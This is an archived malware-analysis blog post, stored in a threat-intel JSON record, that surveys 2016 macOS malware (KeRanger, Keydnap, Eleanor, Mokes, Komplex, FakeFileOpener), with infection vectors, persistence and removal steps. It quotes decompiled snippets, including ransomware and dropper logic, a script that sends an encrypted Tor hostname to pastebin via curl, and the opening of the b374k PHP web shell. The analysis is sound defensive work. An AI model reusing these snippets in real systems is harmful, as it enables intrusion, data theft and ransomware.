{
	"id": "030b27a9-cac9-4f04-942c-f258f9f3f540",
	"created_at": "2026-04-06T03:36:28.377701Z",
	"updated_at": "2026-04-10T03:37:49.751381Z",
	"deleted_at": null,
	"sha1_hash": "0390b2659dd3307a0145bbf3a01baecb0c2219ef",
	"title": "Mac Malware of 2016",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2862560,
	"plain_text": "Mac Malware of 2016\r\nArchived: 2026-04-06 03:09:44 UTC\r\nMac Malware of 2016\r\n› a cumulative analysis of new OS X malware\r\n1/1/2017\r\nIntroduction\r\nDue to sheer volume, Windows malware generally dominates the malicious code and news scene. Of course, Macs\r\nare susceptible to malware as well and 2016 saw a handful of new malware targeting Apple computers.\r\nIn this blog, I wanted to discuss all Mac malware that appeared this year. While each sample has been reported on\r\nbefore (i.e. by the AV company that discovered it), this blog aims to cumulatively cover all in one place.\r\nMoreover, for each, we'll identify the infection vector, persistence mechanism, features/goals, and describe\r\ndisinfection.\r\nIf you want to play along, all samples can be downloaded from Objective-See's malware page.\r\nBy downloading the samples, you waive all rights to claim punitive, incidental and consequential damages\r\nresulting from mishandling or self-infection ;)\r\nAlso, the 'disinfection' instructions provided in this blog are specific to each malware specimen. Often malware\r\ncan install other malware, or allow an remote attacker to do what ever they want. Thus if you were/are infected by\r\nany of these samples, it's suggested you fully re-install OS X.\r\nI'm presenting a talk at RSA 2017 titled \"Meet and Greet with the macOS Malware Class of 2016\" In this talk I'll\r\ndive into the details of each of the malware specimens described here. 
In other words, think of this blog as a\r\npreview of my talk!\r\nHope to see you at RSA :)\r\nTimeline\r\nKeRanger\r\n3/2016\r\nThe first fully-functional, in-the-wild ransomware for OS X.\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 1 of 24\r\nEleanor\r\n7/2016\r\nA PHP-based backdoor that exposed infected computers as a hidden Tor service.\r\nKeydnap\r\n7/2016\r\nA standard backdoor for OS X with a propensity for stealing credentials, which used Tor for its\r\ncommunications.\r\nFake File Opener\r\n8/2016\r\nA rather annoying piece of adware, though it did have a unique persistence mechanism.\r\nMokes\r\n9/2016\r\nA fairly standard OS X backdoor that did support a wide range of features.\r\nKomplex\r\n9/2016\r\nA Russian (APT 28/FancyBear) OS X implant that provided remote 'administrative' capabilities.\r\nKeRanger\r\nfound on: 3/2016\r\nfound by: PaloAlto Networks (report)\r\ninfection vector: infected application on developer's official website\r\nfeatures: encrypt user files for ransom\r\ndisinfection: reboot\r\nOSX/KeRanger is the first fully-functional, in-the-wild ransomware for OS X!\r\n› infection vector\r\nThis malware was unusual for a variety of reasons. First, its infection vector is somewhat (for Mac malware)\r\nunique. In order to surreptitiously infect Mac users, the OSX/KeRanger authors hacked the official website for a\r\npopular OS X BitTorrent application, 'Transmission'.\r\nWith access to the website, the malware authors then infected the legitimate Transmission application with\r\nOSX/KeRanger.
Specifically, they added a new Mach-O binary to the application bundle (as General.rtf).\r\nThe main function of the Transmission.app was modified to execute this malware's binary:\r\n//build path to source (General.rtf)\r\n__sprintf_chk(pathSrc, 0x0, 0x400, \"%s/Resources/General.rtf\", ...);\r\n//build path to destination (kernel_service)\r\n__sprintf_chk(pathDest, 0x0, 0x400, \"%s/Library/kernel_service\", ...);\r\n//read in source file\r\nrbx = fopen(pathSrc, \"rb\");\r\nvar_1448 = fread(r12, 0x1, r13, rbx);\r\nfclose(rbx);\r\n//write it out to destination\r\nr14 = fopen(pathDest, \"wb+\");\r\nfwrite(r12, var_1448, 0x1, r14);\r\nfclose(r14);\r\n//set it to executable\r\nchmod(pathDest, 0x40);\r\n//launch it!\r\nsystem(pathDest);\r\nFinally, the malware authors re-signed the (now) infected application so that Gatekeeper (in its default settings)\r\nwould not prevent the malware from executing:\r\nThus, any time an unsuspecting user downloaded and executed the Transmission application (again, from the\r\nofficial Transmission website), the malware would compromise their Mac. Yikes!\r\n› persistence\r\nAs far as I know, OSX/KeRanger does not contain any logic or code to persist itself. Thus, if the user reboots\r\ntheir system or kills the malware's process, kernel_service, the malware will not be restarted...unless the user re-runs the infected Transmission application.\r\n› features\r\nAnother unique aspect of OSX/KeRanger was its payload or goal. In short, it attempted to encrypt user files for\r\nransom.
Yes, OSX/KeRanger was the first fully-functional, in-the-wild piece of ransomware targeting Apple\r\ncomputers.\r\nReversing the malware reveals its ransomware logic:\r\n//encrypt /Users\r\nrecursive_task(\"/Users\", _encrypt_entry, _putReadme);\r\n//encrypt /Volumes\r\nrecursive_task(\"/Volumes\", _check_ext_encrypt, _putReadme);\r\n//build path to '.kernel_complete'\r\nsprintf_chk(0x0, 0x0, 0x400, \"%s/Library/.kernel_complete\"...);\r\n//write to file\r\nrbx = fopen(0x0, \"w\"); fwrite(\"do not touch this\\n\", 0x12, 0x1, rbx);\r\nAs shown in the pseudo-code snippet, OSX/KeRanger will encrypt all files under /Users/* as well as all files\r\nunder /Volumes that match certain extensions (PaloAlto Networks' report noted about 300, including .doc, .jpg,\r\n.zip, .cpp, etc.).\r\nFor each directory where the ransomware encrypts files, it creates a plaintext 'read-me' file that contains\r\ninstructions to the user on how to pay the ransom in order to recover their files:\r\nOne final, interesting aspect of OSX/KeRanger is that some researchers have convincingly claimed it is a rewrite\r\nor Mac version of the 'linux.encoder' ransomware. Their reasoning is quite compelling and seems to confirm that\r\noftentimes malware authors are quite keen on expanding their potential targets by porting their malicious creations\r\nto OS X.\r\n› disinfection\r\nSince (AFAIK) OSX/KeRanger does not persist, it is trivial to remove:\r\n1. kill the kernel_service process\r\n2. remove ~/Library/kernel_*\r\n3.
upgrade to version 2.93+ of Transmission.app\r\nIt should be noted that currently Mac users should be protected anyway, as Apple revoked the signing certificate\r\n(ID Z7276PX673), as well as updated their XProtect signatures:\r\n$ cat /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist\r\n\u003cdict\u003e\r\n\u003ckey\u003eDescription\u003c/key\u003e\r\n\u003cstring\u003eOSX.KeRanger.A\u003c/string\u003e\r\n\u003ckey\u003eLaunchServices\u003c/key\u003e\r\n\u003cdict\u003e\r\n   \u003ckey\u003eLSItemContentType\u003c/key\u003e\r\n   \u003cstring\u003ecom.apple.application-bundle\u003c/string\u003e\r\n\u003c/dict\u003e\r\n\u003ckey\u003eMatches\u003c/key\u003e\r\n\u003carray\u003e\r\n   \u003cdict\u003e\r\n      \u003ckey\u003eMatchFile\u003c/key\u003e\r\n      \u003cdict\u003e\r\n         \u003ckey\u003eNSURLTypeIdentifierKey\u003c/key\u003e\r\n         \u003cstring\u003epublic.unix-executable\u003c/string\u003e\r\n      \u003c/dict\u003e\r\n      \u003ckey\u003ePattern\u003c/key\u003e\r\n      \u003cstring\u003e488DBDD0EFFFFFBE00000000BA0004000031C04989D8*31F64C89E7*83F8FF7457C785C4EBFFFF00000000\u003c/string\u003e\r\n   ...\r\nKeydnap\r\nfound on: 7/2016\r\nfound by: ESET (report)\r\ninfection vector: infected application on developer's official website\r\nfeatures: backdoor \u0026 credential stealer\r\ndisinfection: remove launch agents\r\nOSX/Keydnap is a fairly standard backdoor for OS X with a propensity for stealing credentials, and uses Tor for its\r\ncommunications.\r\n› infection vector\r\nThe original infection vector for OSX/Keydnap was never discovered. ESET states that, \"It is still not clear how\r\nvictims are initially exposed to OSX/Keydnap.
It could be through attachments in spam messages, downloads from\r\nuntrusted websites...\"\r\nWhat is known is that it was distributed in a zip archive which contained a binary named \"screenshot.jpg \" (note the\r\ntrailing space). Since the filename ended with a space (i.e. \".jpg \"), when a user double-clicked it, it would be executed by\r\nTerminal.app. In other words, the malware would be run.\r\nLater, it was discovered that the official Transmission website (transmissionbt.com) was hacked again 🙄, this\r\ntime to distribute Keydnap. Just as they had with OSX/KeRanger, the malware authors infected the legitimate\r\nTransmission application by adding an extra binary (License.rtf) and then modifying the application's code to execute\r\nit. The infected Transmission application was then (re)signed with another stolen or fraudulently obtained Apple\r\ndeveloper ID: Shaderkin Igor (836QJ8VMCQ):\r\nThus, for a time, any user that downloaded and ran Transmission.app would be infected with OSX/Keydnap.\r\n› persistence\r\nIn order to persist, OSX/Keydnap creates two launch agents, com.apple.iCloud.sync.daemon and\r\ncom.geticloud.icloud.photo:\r\nThe first launch agent plist (com.apple.iCloud.sync.daemon) tells the OS to execute a binary named icloudsyncd.\r\nThis binary is the backdoor component of the malware.\r\nThe second launch agent plist (com.geticloud.icloud.photo) contains the path to the malware's command and control\r\nmechanism. Named icloudproc, this binary is simply a copy of a Tor2Web proxy.\r\n› features\r\nAs mentioned, icloudsyncd is the main component of the malware.
It provides 'standard' backdoor or remote\r\n'administrative' capabilities, such as the ability to download and execute a file, including Python scripts:\r\n//exec downloaded python\r\nsprintf(var_430, \"/tmp/%s\", rbx);\r\nsprintf(var_830, \"python %s\", var_430);\r\nchmod(var_430, 0x1c0);\r\nsystem(var_830);\r\nOSX/Keydnap also contains logic to elevate its privileges, albeit via a very unsophisticated method: just asking:\r\nPerhaps the most interesting feature of the malware is its ability to dump credentials and other sensitive\r\ninformation from the keychain. It does this via code from the open-source keychaindump project. (Note, however,\r\nthat AFAIK this would generate an \"icloudsyncd wants to access the keychain\" alert that the user would have to\r\nallow.)\r\nOSX/Keydnap uses a Tor2Web proxy for command and control. An installed launch agent, icloudproc, is\r\nautomatically started by the OS and listens on 127.0.0.1:9050. As noted by ESET, the main backdoor component\r\n(icloudsyncd) uses this proxy for communication purposes: \"Keydnap is using the onion.to Tor2Web proxy over\r\nHTTPS to report back to its C\u0026C server.\"\r\nlea rdx, qword [0x10000bbe7] ; \"127.0.0.1:9050\"\r\nmov esi, 0x2714\r\nxor eax, eax\r\nmov rdi, rbx\r\ncall curl_easy_setopt\r\n› disinfection\r\nOSX/Keydnap can be removed from an infected system via the following steps:\r\n1. Via the 'launchctl unload' command, unload the backdoor and Tor proxy\r\n2. Remove the launch agent plist files (com.apple.iCloud.sync.daemon.plist and com.geticloud.icloud.photo.plist)\r\nfrom /Library/LaunchAgents or ~/Library/LaunchAgents\r\n3.
Remove the launch agent binaries \u0026 files:\r\na) ~/Library/Application Support/com.apple.iCloud.sync.daemon/\r\nb) ~/Library/Application Support/com.geticloud/\r\nApple has also revoked the Apple developer ID that was used to sign the infected Transmission application:\r\n$ spctl -a -t exec -vv Transmission.app\r\n/Volumes/Transmission/Transmission.app: CSSMERR_TP_CERT_REVOKED\r\nEleanor\r\nfound on: 7/2016\r\nfound by: BitDefender (report)\r\ninfection vector: fake (trojaned) application\r\nfeatures: backdoor (PHP) with audio \u0026 video capture capabilities\r\ndisinfection: remove launch agents\r\nOSX/Eleanor is another basic, albeit 'feature-complete', backdoor (PHP) for Mac computers.\r\n› infection vector\r\nSimilar to other OS X malware of 2016, OSX/Eleanor was distributed in an application via the internet.\r\nHowever, it appears that the malware authors simply (re)created an abandoned application (\"EasyDoc\r\nConvertor\"), as opposed to hacking the official website of a legitimate application.\r\nThe malicious, fake EasyDoc Convertor application was hosted on the popular app sharing website Mac Update.\r\nThus, any user that downloaded and ran this application would be infected with Eleanor.\r\n› persistence\r\nOSX/Eleanor installs three(!) launch agents in order to persist its various components. Obviously, stealth was not\r\nsomething the malware authors cared about at all :P The three launch agents are:\r\n1. com.getdropbox.dropbox.integritycheck.plist → conn\r\n2. com.getdropbox.dropbox.timegrabber.plist → check_hostname\r\n3.
com.getdropbox.dropbox.usercontent.plist → dbd\r\nmv $DIR/com.getdropbox.dropbox.usercontent.plist ~/Library/LaunchAgents/com.getdropbox.dropbox.usercontent.plist\r\nlaunchctl load ~/Library/LaunchAgents/com.getdropbox.dropbox.usercontent.plist\r\nmv $DIR/com.getdropbox.dropbox.integritycheck.plist ~/Library/LaunchAgents/com.getdropbox.dropbox.integritycheck.plist\r\nlaunchctl load ~/Library/LaunchAgents/com.getdropbox.dropbox.integritycheck.plist\r\nmv $DIR/com.getdropbox.dropbox.timegrabber.plist ~/Library/LaunchAgents/com.getdropbox.dropbox.timegrabber.plist\r\nlaunchctl load ~/Library/LaunchAgents/com.getdropbox.dropbox.timegrabber.plist\r\nThe first launch agent, com.getdropbox.dropbox.integritycheck.plist, executes a binary named conn. This simply\r\nsets up a hidden Tor service. The second launch agent, com.getdropbox.dropbox.timegrabber.plist, executes a bash\r\nscript named check_hostname. This script publishes the name of the hidden Tor service to pastebin. The final launch\r\nagent, com.getdropbox.dropbox.usercontent.plist, executes a binary named dbd, which is actually a copy of Apple's\r\nPHP binary:\r\n$ codesign -dvv ~/Library/.dropbox/dbd\r\n...\r\nIdentifier=com.apple.php\r\nAuthority=Software Signing\r\nAuthority=Apple Code Signing Certification Authority\r\nAuthority=Apple Root CA\r\n› features\r\nA rather unique feature of Eleanor is that it essentially turns an infected host into a remotely accessible hidden Tor\r\nservice. The command and control logic for this is implemented with the conn binary.
Via Objective-See's\r\nTaskExplorer utility, it is easy to see the malware listening on both ports 9060 and 9061:\r\nThe malware gets these port values from one of its Tor configuration files, ~/Library/.dropbox/sync/storage:\r\n$ cat sync/storage\r\nGeoIPFile /Users/user/Library/.dropbox/sync/data/list\r\nGeoIPv6File /Users/user/Library/.dropbox/sync/data/list6\r\nHiddenServiceDir /Users/user/Library/.dropbox/sync/hs\r\nHiddenServicePort 80 127.0.0.1:9991\r\nHiddenServicePort 22 127.0.0.1:9992\r\nSOCKSPort 9060\r\nControlPort 9061\r\nThe malware also contains a bash script named check_hostname, which, as previously mentioned, is persisted as a\r\nlaunch agent. The purpose of this script is to encrypt the name (address) of the hidden Tor service that was set up\r\nby the first launch agent, and then publish that to pastebin. This of course allows the attacker to 'find' and connect\r\nto the infected host.\r\n# encrypt tor name ('hostname')\r\n# e.g. 'xjd6uzkuyonxzrz2.onion'\r\nHOSTNAME=$(cat /Users/$USER/Library/.dropbox/sync/hs/hostname | cut -d '.' -f 1 | openssl rsautl -encrypt -pubin -inkey /Users/$USER/Library/.dropbox/public.key | openssl enc -base64 | sed \"s/\\+/PLUS/g\")\r\n# post to pastebin (pastebin.com/api/api_post.php)\r\nPASTEID=$(curl -sd \"api_paste_code=$HOSTNAME\u0026api_option=paste\u0026api_dev_key=d1e52e9d2452e1810279527aa1a83c8b\u0026api_paste_private=1\u0026api_user_key=df8a73a0813c422465564c913e760d87\" \"http://pastebin.com/api/api_post.php\" | cut -d \"/\" -f 4)\r\nThe core backdoor logic of OSX/Eleanor is actually implemented in PHP; this is why the malware has a copy of\r\nApple's PHP binary.
Specifically, the malware contains a copy of the b374k shell (v3.2.3), which is available\r\nonline at github.com/b374k.\r\n\u003c?php\r\n/*\r\n  b374k shell 3.2.3\r\n  Jayalah Indonesiaku\r\n  https://github.com/b374k/b374k\r\n*/\r\n$GLOBALS['pass'] = \"15bd408e435dc1a1509911cfd8c312f46ed54226\";\r\n$func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on\";$b374k=$func('$ ...\r\nThe PHP shell affords the attacker complete control over an infected remote computer:\r\nTo further extend the features or capabilities of the malware, it 'ships' with several utilities such as netcat and\r\nwacaw. The latter, wacaw, is available online, where it is described as \"a little command-line tool for Mac OS X\r\nthat allows you to capture both still pictures and video from an attached camera\". Thus, an attacker could record\r\nthe user of an infected Mac.\r\n› disinfection\r\nTo remove OSX/Eleanor from a system, simply unload and then delete the three aforementioned launch agents.\r\nFollowing this, delete the 'hidden' ~/Library/.dropbox directory and the malicious EasyDoc Convertor application.\r\nApple has also updated XProtect with a signature to block Eleanor:\r\n$ cat /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist\r\n\u003ckey\u003eDescription\u003c/key\u003e\r\n\u003cstring\u003eOSX.Eleanor.A\u003c/string\u003e\r\n\u003ckey\u003eLaunchServices\u003c/key\u003e\r\n\u003cdict\u003e\r\n   \u003ckey\u003eLSItemContentType\u003c/key\u003e\r\n   \u003cstring\u003ecom.apple.application-bundle\u003c/string\u003e\r\n\u003c/dict\u003e\r\n\u003ckey\u003eMatches\u003c/key\u003e\r\n\u003carray\u003e\r\n   \u003cdict\u003e\r\n         \u003ckey\u003eMatchType\u003c/key\u003e\r\n         \u003cstring\u003eMatchAny\u003c/string\u003e\r\n         \u003ckey\u003eMatches\u003c/key\u003e\r\n         \u003carray\u003e\r\n            \u003cdict\u003e
            \u003ckey\u003eMatchFile\u003c/key\u003e\r\n            \u003cdict\u003e\r\n               \u003ckey\u003eNSURLTypeIdentifierKey\u003c/key\u003e\r\n               \u003cstring\u003epublic.unix-executable\u003c/string\u003e\r\n            \u003c/dict\u003e\r\n            \u003ckey\u003eMatchType\u003c/key\u003e\r\n            \u003cstring\u003eMatch\u003c/string\u003e\r\n            \u003ckey\u003eIdentity\u003c/key\u003e\r\n            \u003cdata\u003e3mQnUelrjFN0TwMab36SnVMiYyE=\u003c/data\u003e\r\n            \u003c/dict\u003e\r\n            \u003cdict\u003e\r\n            \u003ckey\u003eMatchFile\u003c/key\u003e\r\n            \u003cdict\u003e\r\n               \u003ckey\u003eNSURLTypeIdentifierKey\u003c/key\u003e\r\n               \u003cstring\u003epublic.unix-executable\u003c/string\u003e\r\n            \u003c/dict\u003e\r\n      ...\r\nFake File Opener\r\nfound on: 8/2016\r\nfound by: Malwarebytes (report)\r\ninfection vector: fake ('security') popup\r\nfeatures: adware, adware installer\r\ndisinfection: delete application\r\nOSX/FakeFileOpener is a rather silly piece of adware, though it does have a unique persistence mechanism.\r\n› infection vector\r\nOSX/FakeFileOpener is installed along with other annoying OS X adware when a user is tricked into believing a\r\nfake security alert originating from 'AdvancedMacCleaner.com'.\r\nIf the user clicks the 'Install Security Upgrade Now' button and executes the downloaded adware installer package,\r\nthey will infect themselves. As the OSX/FakeFileOpener adware application, 'Mac File Opener.app', was signed,\r\nGatekeeper (in its default settings) would allow it to execute:\r\n› persistence\r\nThomas Reed (@thomasareed), the malware reverser who originally analyzed the sample, noted that, \"even more\r\nintriguing, this app didn't have any apparent mechanism for being launched. It hadn't been added to my login\r\nitems.
There wasn't a new launch agent or daemon designed to load it. It simply seemed to be sitting there, doing\r\nnothing.\"\r\nDigging deeper, he discovered that this malicious application (by means of its Info.plist file) registers itself as the\r\n'document handler' for a myriad of file types. In his words:\r\n\"Essentially, what this app had done is set itself up as an app that can open most files that are at all likely to be on\r\nthe typical user's system. Worse, if there is no other app to open a specific file, this app would be the default. It\r\nturns out that this is exactly what that app wants, and it takes full advantage of that fact.\"\r\nSince this mechanism requires that a user open a file whose type previously didn't have a default 'document\r\nhandler' and that matches one 'Mac File Opener' registered for, this is a somewhat 'unreliable' persistence\r\nmechanism. However, the upside to this method is that it will 'bypass' tools such as BlockBlock that monitor for\r\ntrue persistence mechanisms (i.e. ones that require no user interaction but instead are automatically executed each\r\ntime the system is rebooted or the user logs in).\r\nIt's rare to find novel persistence mechanisms in OS X malware. As such, I previously dedicated an entire blog\r\npost, titled \"Click File, App Opens\", that digs into the technical details of this persistence and how, at the OS level,\r\nsuch document handlers work.\r\n› features\r\nOSX/FakeFileOpener is part of a fairly standard, run-of-the-mill OS X adware package. It appears that its goal is\r\nsimply to get the user to install more adware. Specifically, whenever the Mac File Opener.app is launched (when\r\nthe user tries to open any file it has registered a document handler for), it will display a popup with a 'Search Web'\r\nbutton.
If the user clicks this button, it will load www.macfileopener.org in a browser window.\r\nvoid -[AppDelegate searchWeb:]\r\n{\r\n  var_80 = [[@\"Adva\" stringByAppendingString:@\"nced Ma\"] stringByAppendingString:@\"c Cleaner\"];\r\n  var_88 = [[@\"Mac A\" stringByAppendingString:@\"dware C\"] stringByAppendingString:@\"leaner\"];\r\n  var_90 = [[@\"Mac Sp\" stringByAppendingString:@\"ace Re\"] stringByAppendingString:@\"viver\"];\r\n  var_98 = [[@\"Disk R\" stringByAppendingString:@\"evi\"] stringByAppendingString:@\"ver\"];\r\n  var_A0 = [[@\"Disk Cl\" stringByAppendingString:@\"eanu\"] stringByAppendingString:@\"p Pro\"];\r\n  ....\r\n  [[NSWorkspace sharedWorkspace] openURL:[NSURL URLWithString:[NSString\r\n    stringWithFormat:@\"http://macfileopener.com/ ext/%@/?amc=%@\u0026madc=%@\u0026msr=%@\u0026drv=%@\u0026dcp=%@\",\r\n    [var_30 extension], var_58, var_60, var_68, var_70, var_78]]];\r\n}\r\nThis website will often display other adware-related popups and alerts to trick the user into downloading and\r\ninstalling even more malware. As Thomas Reed notes: \"these pages will download other junk PCVARK apps, such\r\nas Mac Adware Remover or Mac Space Reviver.\"\r\n› disinfection\r\nTo remove OSX/FakeFileOpener, simply delete the Mac File Opener application.
Behind the scenes, this will\r\ncause the OS to also unregister its document handlers:\r\n# fs_usage -w -f filesystem | grep csstore\r\nrename com.apple.LaunchServices-134501.csstore~ lsd.31116\r\nopen com.apple.LaunchServices-134501.csstore lsd.31116\r\nWrData[AT2] com.apple.LaunchServices-134501.csstore lsd.31116\r\nWrData[AT2] com.apple.LaunchServices-134501.csstore lsd.31116\r\n$ /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -dump | grep \"Mac File Opener\" | wc\r\n0 0 0\r\nMokes\r\nfound on: 9/2016\r\nfound by: Kaspersky (report)\r\ninfection vector: unknown\r\nfeatures: backdoor, with logic to capture screenshots, audio, video \u0026 keystrokes\r\ndisinfection: delete launch agent\r\nWhile OSX/Mokes does support a wide range of features, at its core it's still a fairly standard OS X backdoor.\r\n› infection vector\r\nHow users become infected with OSX/Mokes is still unknown. Kaspersky, the AV company that discovered it,\r\nstated, \"...we can only speculate how this malware makes it to the victim machine. All vectors are possible:\r\nexploits, installation via another previously installed malware and of course via social engineering.\"\r\n› persistence\r\nLaunch Agents are the preferred method of persistence for OS X malware. OSX/Mokes conforms to this trend,\r\ninstalling itself as a launch agent via storeuserd.plist in ~/Library/LaunchAgents/.
Looking at its disassembly, it's\r\neasy to find the embedded template the malware uses for the launch agent:\r\nEkomsAutorun::service(void)::launchdContextTemplate\r\ndb '?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e',0Ah\r\ndb '',0Ah\r\ndb '',0Ah\r\ndb 9,'Label',0Ah\r\ndb 9,'%1',0Ah\r\ndb 9,'ProgramArguments',0Ah\r\ndb 9,'',0Ah\r\ndb 9,9,'%2',0Ah\r\ndb 9,'',0Ah\r\ndb 9,'RunAtLoad',0Ah\r\ndb 9,'',0Ah\r\ndb 9,'KeepAlive',0Ah\r\ndb 9,'',0Ah\r\ndb '',0Ah\r\ndb '',0Ah,0\r\n› features\r\nBesides basic features such as download and execute, OSX/Mokes supports a fairly wide range of other\r\ncapabilities, as noted by Kaspersky: \"This malware...is able to steal various types of data from the victim’s\r\nmachine (Screenshots, Audio-/Video-Captures, Office-Documents, Keystrokes).\" One can confirm this by reversing\r\nthe malware's binary. For example, below are several hard-coded file search constants:\r\n0000001C unicode :/file-search\r\n0000000E unicode *.xlsx\r\n0000000C unicode *.xls\r\n0000000E unicode *.docx\r\n0000000C unicode *.doc\r\nThe malware also monitors for removable media (e.g. USB sticks). To record the user, the malware utilizes Qt.\r\nThis cross-platform framework contains OS X-specific webcam recording code:\r\n//embedded Qt methods\r\nAVFMediaRecorderControl::AVFMediaRecorderControl(AVFCameraService *,QObject *)\r\nAVFMediaRecorderControl::setState(QMediaRecorder::State)\r\nAVFMediaRecorderControl::setupSessionForCapture(void)\r\n//disassembly of 'setupSessionForCapture' method\r\nAVFMediaRecorderControl::setupSessionForCapture(void) proc\r\n...\r\n call AVFCameraSession::state(void)\r\n call AVFAudioInputSelectorControl::createCaptureDevice(void)\r\n lea rdx, \"Could not connect the video recorder\"\r\n ...\r\n call QMediaRecorderControl::error(int,QString const\u0026)\r\n› disinfection\r\nRemoving OSX/Mokes is slightly more complex, as the malware may install itself into multiple locations.
Once the\r\nmalware is detected, though, simply unload its launch agent (e.g. launchctl unload\r\n~/Library/LaunchAgents/storeuserd.plist) and then delete its binary (e.g. storeuserd).\r\nBesides the standard storeuserd name, the malware may install itself to:\r\n~/Library/com.apple.spotlight/SpotlightHelper\r\n~/Library/Dock/com.apple.dock.cache\r\n~/Library/Skype/SkypeHelper\r\n~/Library/Dropbox/DropboxCache\r\n~/Library/Google/Chrome/nacld\r\n~/Library/Firefox/Profiles/profiled\r\nKomplex\r\nfound on: 9/2016\r\nfound by: PaloAlto Networks (report)\r\ninfection vector: email\r\nfeatures: backdoor, with standard features\r\ndisinfection: delete launch agent\r\nRussian cyber-operations were a popular topic in 2016. OSX/Komplex is one of the Russians' (APT 28/Fancy\r\nBear's) OS X implants.\r\n› infection vector\r\nOSX/Komplex is a Mac application that is distributed via email (as an attachment). When executed, it will infect\r\nthe system, but also display a PDF document in a (lame) attempt to hide the infection.
The antivirus company\r\nIntego notes that:\r\n\"The person who receives the email may think they are opening a PDF file with future plans for the Russian\r\naerospace program, but in fact, it is a Trojan that will install files on the system and connect to a remote command\r\n\u0026 control (c\u0026c) server.\"\r\nLooking at the disassembly of the malware's main function shows the malware opening the embedded PDF via\r\nthe Preview application:\r\nint main(int arg0, int arg1)\r\n{\r\n  var_38 = [NSSearchPathForDirectoriesInDomains(0xf, 0x1, 0x1) objectAtIndex:0x0];\r\n  var_48 = [NSString stringWithFormat:@\"SetFile -a E %@/roskosmos_2015-2025.pdf\", var_38];\r\n  var_50 = [NSString stringWithFormat:@\"rm -rf %@/roskosmos_2015-2025.app\", var_38];\r\n  var_58 = [NSString stringWithFormat:@\"open -a Preview.app %@/roskosmos_2015-2025.pdf\", var_38];\r\n  system([var_50 UTF8String]);\r\n  system([var_48 UTF8String]);\r\n  system([var_58 UTF8String]);\r\n  ...\r\n}\r\n› persistence\r\nHow does this malware persist? If you guessed launch agent, you are right! OSX/Komplex persists via\r\n~/Library/LaunchAgents/com.apple.updates.plist.
This launch agent plist points to the malware's binary,\r\nwhich is located in /Users/Shared/.local/kextd.\r\n$ cat ~/Library/LaunchAgents/com.apple.updates.plist\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n\u003cplist version=\"1.0\"\u003e\r\n\u003cdict\u003e\r\n   \u003ckey\u003eLabel\u003c/key\u003e\r\n   \u003cstring\u003ecom.apple.updates\u003c/string\u003e\r\n   \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n   \u003carray\u003e\r\n      \u003cstring\u003e/Users/Shared/.local/kextd\u003c/string\u003e\r\n   \u003c/array\u003e\r\n   \u003ckey\u003eRunAtLoad\u003c/key\u003e\r\n...\r\n› features\r\nWhen executed, OSX/Komplex first checks if it is being debugged or executed on a system that is not connected\r\nto the internet:\r\nint main(int argc, char* argv[])\r\n{\r\n  if ((AmIBeingDebugged() \u0026 0x1) == 0x0)\r\n  {\r\n    while ((connectedToInternet() \u0026 0x1 \u0026 0x1) == 0x0)\r\n    {\r\n      sleep(0x3c);\r\n    }\r\n    rax = sub_100005b40();\r\n  }\r\n  else\r\n  {\r\n    remove(*argv);\r\n    rax = 0x0;\r\n  }\r\n  return rax;\r\n}\r\nOSX/Komplex implements only a few basic features. However, these are sufficient to allow a remote attacker to\r\ncompletely control an infected host. These features include:\r\ndownload a file\r\ndelete a file\r\nconfigure the backdoor\r\nexecute a file\r\nexecute a shell command\r\n$ nm Komplex | c++filt -p -i | grep File\r\n0000000100001e60 T FileExplorer::executeFile(char const*, unsigned long)\r\n0000000100001b90 T FileExplorer::getFileName()\r\n0000000100001b70 T FileExplorer::setFileName(char*)\r\n0000000100001e00 T FileExplorer::setParameters(char*)\r\n0000000100001bd0 T FileExplorer::executeShellCommand()\r\n0000000100001e20 T FileExplorer::setRemove()\r\nBesides the Russia connection, OSX/Komplex is rather interesting, as the PaloAlto researchers note it may have\r\nactually been spotted before.
In 2015, BAE Systems released a report titled \"New Mac OS Malware Exploits\r\nMackeeper.\" In this report, they describe a new (unnamed) piece of malware that exploited a remote vulnerability\r\nin the infamous MacKeeper software in order to infect Mac users. The PaloAlto researchers noted a lot of similar\r\ncode, leading them to state, \"these overlaps suggest that the Trojan delivered by the MacKeeper vulnerability was\r\nin fact the Komplex Trojan.\"\r\n› disinfection\r\nIt is trivial to remove OSX/Komplex. First, simply unload the malware's launch agent\r\n(~/Library/LaunchAgents/com.apple.updates.plist). Then delete both the launch agent plist and binary:\r\n$ launchctl unload ~/Library/LaunchAgents/com.apple.updates.plist\r\n$ rm ~/Library/LaunchAgents/com.apple.updates.plist\r\n$ rm /Users/Shared/.local/kextd\r\nConclusion\r\nWell, that's a wrap! In this blog we discussed (all?) Mac malware that emerged in 2016. Hopefully 2017 will bring\r\nus lots of new malware to play with :)\r\nSource: https://objective-see.org/blog/blog_0x16.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://objective-see.org/blog/blog_0x16.html"
	],
	"report_names": [
		"blog_0x16.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
